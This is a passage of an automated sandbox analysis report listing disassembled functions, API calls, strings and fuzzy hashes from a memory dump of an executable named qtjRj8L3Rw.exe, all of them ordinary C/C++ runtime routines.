                                  • Instruction ID: 24b59ead9c5094f5e085dbca622f423424be7e0ddedd2baa0a984a2db8b29d4d
                                  • Opcode Fuzzy Hash: e402af3284efea87713c83355849c6270cc29a97dde739a87dcae7e6a75fd0f1
                                  • Instruction Fuzzy Hash: 0641BF72910258CFCB28DF15D891BAEBBF8EB14710F1541A9E8056B351DB31BD46CBD2
                                  Uniqueness

                                  Uniqueness Score: 0.53%

                                  APIs
                                  • _free.LIBCMT ref: 00C0CFD2
                                    • Part of subcall function 00C068D3: HeapFree.KERNEL32(00000000,00000000,?,00C0D25C,?,00000000,?,?,?,00C0D4FF,?,00000007,?,?,00C0DA9C,?), ref: 00C068E9
                                    • Part of subcall function 00C068D3: GetLastError.KERNEL32(?,?,00C0D25C,?,00000000,?,?,?,00C0D4FF,?,00000007,?,?,00C0DA9C,?,?), ref: 00C068FB
                                  • _free.LIBCMT ref: 00C0CFE4
                                  • _free.LIBCMT ref: 00C0CFF6
                                  • _free.LIBCMT ref: 00C0D008
                                  • _free.LIBCMT ref: 00C0D01A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: da5cbb19b7bc0fce347e492826ceb23762ed6ad73baf6a85f967de8d770befb2
                                  • Instruction ID: c81d9d530b89900198751d025780a4caf7ad324f5b2fd602cd323b98a8d25f5a
                                  • Opcode Fuzzy Hash: da5cbb19b7bc0fce347e492826ceb23762ed6ad73baf6a85f967de8d770befb2
                                  • Instruction Fuzzy Hash: FBF0123251422067CA30EFD4E4C1E1F77DAAA01710B544915F02AE7DC1CB30FD91DBA5
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00BDA484
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID: <$?$mxyz
                                  • API String ID: 118556049-2422011075
                                  • Opcode ID: 9399e1208a94ccaf9b9fdf37652b3fee5b068c650358d08d410c41ca6b0852d6
                                  • Instruction ID: fa8c9552b99975751fd79a91874bb2f56b797b27c2c096ec5dceecfffce27b84
                                  • Opcode Fuzzy Hash: 9399e1208a94ccaf9b9fdf37652b3fee5b068c650358d08d410c41ca6b0852d6
                                  • Instruction Fuzzy Hash: 3261F471D00288CBDB24DF68C8447AEFBF5EF44314F2446AEE415A7381E7B59A89CB91
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00BD362E
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00BD363D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: at line $, column
                                  • API String ID: 4194217158-191570568
                                  • Opcode ID: ed97a513914cc2fc80b9f6e3d76fb14001e8d86d5f1d77fb82f02017d3a1b1e9
                                  • Instruction ID: b6583b3ed6b3bbdefd87bcaf401c1f480bc71712a70a0f86ba01dd4fb3a78588
                                  • Opcode Fuzzy Hash: ed97a513914cc2fc80b9f6e3d76fb14001e8d86d5f1d77fb82f02017d3a1b1e9
                                  • Instruction Fuzzy Hash: BC51F3719002489FEB18CF68D945BAEFBF5EF85704F10469DE404A7392EB74DA848B51
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: C:\Users\user\Desktop\qtjRj8L3Rw.exe
                                  • API String ID: 0-552899506
                                  • Opcode ID: b21ec01b14434e392af2c1578bb7ab591fcf3b49f30ae5bc976b97ee0fcc2216
                                  • Instruction ID: 8ee7e392a6725c59af62c33e3e634776d6da8df87a94bac8284d67c7ca21aeed
                                  • Opcode Fuzzy Hash: b21ec01b14434e392af2c1578bb7ab591fcf3b49f30ae5bc976b97ee0fcc2216
                                  • Instruction Fuzzy Hash: FD317271A00318ABDB21DF99D989EAEBBF8EB89710B50407AF814D7291D6709F41DB60
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00BF9603
                                  • CatchIt.LIBVCRUNTIME ref: 00BF96E9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CatchEncodePointer
                                  • String ID: MOC$RCC
                                  • API String ID: 1435073870-2084237596
                                  • Opcode ID: f94cd707fb072880aa2a27f0333a8a3acbda37b8eb01464c84140305c25c97e0
                                  • Instruction ID: e9f12e4d21af4c99301919b5b56adb9257ce302399f9ab69f47dc7645369ffec
                                  • Opcode Fuzzy Hash: f94cd707fb072880aa2a27f0333a8a3acbda37b8eb01464c84140305c25c97e0
                                  • Instruction Fuzzy Hash: 1741347290020DAFDF16DF98CD81AEEBBB5FF48304F188199FA04A7261D3359A54DB50
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00BD2C5F
                                    • Part of subcall function 00BF731A: RaiseException.KERNEL32(E06D7363,00000001,00000003,00BD21DC,?,?,?,00BD21DC,?,00C2D414), ref: 00BF737A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionRaise___std_exception_copy
                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 3109751735-1866435925
                                  • Opcode ID: 715dc07dde1f025595d890dfd9a04b2a1f56c6d59c3cd5193484520b46451bb2
                                  • Instruction ID: 9e5f607f1700360bbd88e17774ba485271b1908920eb8c1ad5036d7195ab3dd4
                                  • Opcode Fuzzy Hash: 715dc07dde1f025595d890dfd9a04b2a1f56c6d59c3cd5193484520b46451bb2
                                  • Instruction Fuzzy Hash: 911103B15103086BCB04DF58D802BA6F3E8EF60310F14896BF9158BA81FB70E954CBA5
                                  Uniqueness

                                  Uniqueness Score: 7.75%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strrchr
                                  • String ID:
                                  • API String ID: 3213747228-0
                                  • Opcode ID: 30215aa7633be5a151444ef3af0f45258a63018f10652b0b38a6e06bf638477f
                                  • Instruction ID: b4db753f81f60a114f5856c7be373727475d0406a53cf64e65b69db025454b69
                                  • Opcode Fuzzy Hash: 30215aa7633be5a151444ef3af0f45258a63018f10652b0b38a6e06bf638477f
                                  • Instruction Fuzzy Hash: C1B15931D082459FDB19CF68C8417FEBBF5EF55340F2482AAE854DB281D234AE41DB60
                                  Uniqueness

                                  Uniqueness Score: 0.57%

                                  APIs
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000004,?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00BE6E01
                                  • GetLastError.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00BE6E15
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00BE6E31
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00BE6E59
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$ErrorLast
                                  • String ID:
                                  • API String ID: 1717984340-0
                                  • Opcode ID: 059fd646b8d3ce90e901801213f6d893202876b34d018f0acc08239756e084b8
                                  • Instruction ID: 98978c08c4916638ebcdb6186edbaf518de775821bdd807e1dbf21d25fc0becf
                                  • Opcode Fuzzy Hash: 059fd646b8d3ce90e901801213f6d893202876b34d018f0acc08239756e084b8
                                  • Instruction Fuzzy Hash: 9C51E875600245EBCB249F69DC41FAEB7E5EF64740F1481ADF9059B281EB31F910CB91
                                  Uniqueness

                                  Uniqueness Score: 0.07%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: cf5435f4d5e4daa5ae8843d7af8b241029262684930e5fc4bb02ac1134481622
                                  • Instruction ID: a4afbbf432b3b4ca07d9aeb9049d7afe3dd859f9f960980ad3121eaf09b8f9e5
                                  • Opcode Fuzzy Hash: cf5435f4d5e4daa5ae8843d7af8b241029262684930e5fc4bb02ac1134481622
                                  • Instruction Fuzzy Hash: 8351E57160420EAFEB299F24D885B7A77E4EF40710F1445ADEF0567291EB32ED58CB90
                                  Uniqueness

                                  Uniqueness Score: 1.18%

                                  APIs
                                  • _free.LIBCMT ref: 00C1597E
                                  • _free.LIBCMT ref: 00C159A7
                                  • SetEndOfFile.KERNEL32(00000000,00C13F56,00000000,00C08E9C,?,?,?,?,?,?,?,00C13F56,00C08E9C,00000000), ref: 00C159D9
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00C13F56,00C08E9C,00000000,?,?,?,?,00000000), ref: 00C159F5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFileLast
                                  • String ID:
                                  • API String ID: 1547350101-0
                                  • Opcode ID: 3f5d571402001bb5709bb17eac31023fab44bac60056449ae8493099dacca126
                                  • Instruction ID: deb538cc5c19a6eaf9e2b6751dedc377437f393b18bd79edab43e235e5f01156
                                  • Opcode Fuzzy Hash: 3f5d571402001bb5709bb17eac31023fab44bac60056449ae8493099dacca126
                                  • Instruction Fuzzy Hash: CA41E672900A05DBDB11ABA8CC46BDD77A5AF86330F154210F834E71D1EA30CE92F762
                                  Uniqueness

                                  Uniqueness Score: 1.64%

                                  APIs
                                  • GetLastError.KERNEL32(00000008,?,00000000,00C0C55A,00BF591B,00BF5961,?,00BF57A8,00000000), ref: 00C06F72
                                  • _free.LIBCMT ref: 00C06FCF
                                  • _free.LIBCMT ref: 00C07005
                                  • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00BF57A8,00000000), ref: 00C07010
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast_free
                                  • String ID:
                                  • API String ID: 2283115069-0
                                  • Opcode ID: d440da8295a845f0852c866ccf35d1067188eaa62af0f46cc423c90f34cc7f4d
                                  • Instruction ID: 893e64b5ad49935e96640db51edadb1858e0f412f22864a5c74964e3ffb78f79
                                  • Opcode Fuzzy Hash: d440da8295a845f0852c866ccf35d1067188eaa62af0f46cc423c90f34cc7f4d
                                  • Instruction Fuzzy Hash: A1110A726047126BD6212BB5EC85F2F215A9BC13B8F354334F135921D3ED31CD22E261
                                  Uniqueness

                                  Uniqueness Score: 0.28%

                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,00C0185C,00C06950,?,?,00BF48E0,?,?,00BE8B4A,?,?,00BD1154), ref: 00C070C9
                                  • _free.LIBCMT ref: 00C07126
                                  • _free.LIBCMT ref: 00C0715C
                                  • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00C0185C,00C06950,?,?,00BF48E0,?,?,00BE8B4A,?), ref: 00C07167
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast_free
                                  • String ID:
                                  • API String ID: 2283115069-0
                                  • Opcode ID: 6419693c48a0321c135c5b6e49c41807f57eeb4e94fea095a4d7969a3f87643a
                                  • Instruction ID: 12ba3768160cbe19a29dc5ffe0a0b79d02d3b27353c9b167a6e31ba4751932dc
                                  • Opcode Fuzzy Hash: 6419693c48a0321c135c5b6e49c41807f57eeb4e94fea095a4d7969a3f87643a
                                  • Instruction Fuzzy Hash: 8011E932A087116BE6252675DC85F2F216ADBC2778F358334F135926E3ED31DE12D261
                                  Uniqueness

                                  Uniqueness Score: 0.28%

                                  APIs
                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00C1329D,00000000,00000001,00000000,00000000,?,00C08407,?,00C01707,00000000), ref: 00C157B9
                                  • GetLastError.KERNEL32(?,00C1329D,00000000,00000001,00000000,00000000,?,00C08407,?,00C01707,00000000,?,00000000,?,00C0895B,?), ref: 00C157C5
                                    • Part of subcall function 00C1578B: CloseHandle.KERNEL32(FFFFFFFE,00C157D5,?,00C1329D,00000000,00000001,00000000,00000000,?,00C08407,?,00C01707,00000000,?,00000000), ref: 00C1579B
                                  • ___initconout.LIBCMT ref: 00C157D5
                                    • Part of subcall function 00C1574D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C1577C,00C1328A,00000000,?,00C08407,?,00C01707,00000000,?), ref: 00C15760
                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00C1329D,00000000,00000001,00000000,00000000,?,00C08407,?,00C01707,00000000,?), ref: 00C157EA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                  • String ID:
                                  • API String ID: 2744216297-0
                                  • Opcode ID: dfa7b4a50c97c76264ca8867a08c620d883bf8915e78b52c636746e9c57f0fa1
                                  • Instruction ID: 81c55f48383541f1811ff5550842d4db9a9d4fedf8669e0225588951ee818355
                                  • Opcode Fuzzy Hash: dfa7b4a50c97c76264ca8867a08c620d883bf8915e78b52c636746e9c57f0fa1
                                  • Instruction Fuzzy Hash: 1FF01C36411624FBCF226F91DC0ABDD3F66FB4A3A0B014011FA1995171C63289A0EBD1
                                  Uniqueness

                                  Uniqueness Score: 0.24%

                                  APIs
                                  • SleepConditionVariableCS.KERNELBASE(?,00BF461A,00000064), ref: 00BF46A0
                                  • LeaveCriticalSection.KERNEL32(00C2F1D8,?,?,00BF461A,00000064,?,00C3013C,?,00BD4124,00C301A8,00C3013C,00BD834F,5CB9E59C,0000000F,?,00000000), ref: 00BF46AA
                                  • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00BF461A,00000064,?,00C3013C,?,00BD4124,00C301A8,00C3013C,00BD834F,5CB9E59C,0000000F,?,00000000), ref: 00BF46BB
                                  • EnterCriticalSection.KERNEL32(00C2F1D8,?,00BF461A,00000064,?,00C3013C,?,00BD4124,00C301A8,00C3013C,00BD834F,5CB9E59C,0000000F,?,00000000), ref: 00BF46C2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                  • String ID:
                                  • API String ID: 3269011525-0
                                  • Opcode ID: 312ff91c45415439934e0e399c0bdb267a461fb0d656004cbb4be996797a63d3
                                  • Instruction ID: 75805cb6c6f54abf97fbaed8c6ce62879838894aac48c8b9a1cfa45900d6a01d
                                  • Opcode Fuzzy Hash: 312ff91c45415439934e0e399c0bdb267a461fb0d656004cbb4be996797a63d3
                                  • Instruction Fuzzy Hash: CBE0ED36542228FBCF111B50FC09BEE7A38AB0AB62B5080B4FA0667560C76119269BE5
                                  Uniqueness

                                  Uniqueness Score: 3.32%

                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00BD33AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: parse error$ror
                                  • API String ID: 2659868963-4201802366
                                  • Opcode ID: cbf69417a70954cd6d1e657042b3ac6b3b59ff43ff998456e545ef59a8585b55
                                  • Instruction ID: 41d1680b4e2dcb6ff1726859fd212d4248b0c5562175197a198eed5b440760e7
                                  • Opcode Fuzzy Hash: cbf69417a70954cd6d1e657042b3ac6b3b59ff43ff998456e545ef59a8585b55
                                  • Instruction Fuzzy Hash: E3B1B1719002588FEB19CF68CD45BADFBB2EF45304F1082D9E408AB396EB759AC4CB51
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00BF1800
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID: cannot get value
                                  • API String ID: 118556049-2333289761
                                  • Opcode ID: d9b4b19be006df723c17d79442467b0c2d04f564c3ea310f2ca61170a37aef69
                                  • Instruction ID: ae055c9a340760794e696e3ec78527e089239b564eceb295414045829b68e6d8
                                  • Opcode Fuzzy Hash: d9b4b19be006df723c17d79442467b0c2d04f564c3ea310f2ca61170a37aef69
                                  • Instruction Fuzzy Hash: A391AF75900249DFCB14DF98C8909EEFBF4FF48310B148A99D955AB346D770AD0ACB90
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: [json.exception.
                                  • API String ID: 0-791563284
                                  • Opcode ID: 88e3545bb70ee627000e302b473c8c9070389b3bf423bebae96830094c89386d
                                  • Instruction ID: 2aa34da19045f218445e90d3973670039318de18c256379b92988e00a9bb78cb
                                  • Opcode Fuzzy Hash: 88e3545bb70ee627000e302b473c8c9070389b3bf423bebae96830094c89386d
                                  • Instruction Fuzzy Hash: 27912971D002888BEB19CF68C845BAEFBF5EF55300F10469DE814A77D2E7759A85CBA0
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                    • Part of subcall function 00C0B5A8: GetOEMCP.KERNEL32(00000000,00C0B81A,?,00000000,00C0F573,00C0F573,00000000,00000000,?), ref: 00C0B5D3
                                  • _free.LIBCMT ref: 00C0B877
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID: `6
                                  • API String ID: 269201875-4267953654
                                  • Opcode ID: c2244743a914a48a2578bbfa1a98279b1258f0b82d94b828a0b4218c4d51d407
                                  • Instruction ID: f9d5576fd303a5a0032da90909923915dcf05a3aeb9269b6181501b061bbb586
                                  • Opcode Fuzzy Hash: c2244743a914a48a2578bbfa1a98279b1258f0b82d94b828a0b4218c4d51d407
                                  • Instruction Fuzzy Hash: 42319071900249AFDB11DFA8C880B9E77E9EF44314F158269F920AB2E1E731DE50DB50
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00BD287B
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BD28CA
                                    • Part of subcall function 00BF5876: _Yarn.LIBCPMT ref: 00BF5895
                                    • Part of subcall function 00BF5876: _Yarn.LIBCPMT ref: 00BF58B9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                  • String ID: bad locale name
                                  • API String ID: 1908188788-1405518554
                                  Uniqueness

                                  Uniqueness Score: 3.53%

                                  APIs
